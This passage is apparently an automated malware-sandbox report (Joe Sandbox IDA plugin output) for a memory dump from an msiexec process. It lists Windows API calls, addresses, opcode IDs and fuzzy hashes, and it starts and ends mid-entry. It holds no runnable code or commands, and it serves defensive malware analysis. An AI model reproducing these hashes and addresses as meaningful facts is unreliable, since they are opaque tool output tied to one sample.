                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                APIs
                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3150196962-0
                                                                                • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                APIs
                                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$PointerRead
                                                                                • String ID:
                                                                                • API String ID: 3154509469-0
                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                APIs
                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                • String ID:
                                                                                • API String ID: 4232544981-0
                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                APIs
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$FileModuleName
                                                                                • String ID:
                                                                                • API String ID: 3859505661-0
                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                APIs
                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                APIs
                                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: EnumNamesResource
                                                                                • String ID:
                                                                                • API String ID: 3334572018-0
                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                APIs
                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004095FC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3655998216-0
                                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00445426
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                • String ID:
                                                                                • API String ID: 1828521557-0
                                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                APIs
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@FilePointermemcpy
                                                                                • String ID:
                                                                                • API String ID: 609303285-0
                                                                                • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID:
                                                                                • API String ID: 2081463915-0
                                                                                • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                APIs
                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                • String ID:
                                                                                • API String ID: 2136311172-0
                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                APIs
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@
                                                                                • String ID:
                                                                                • API String ID: 1936579350-0
                                                                                • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                APIs
                                                                                Memory Dump Source
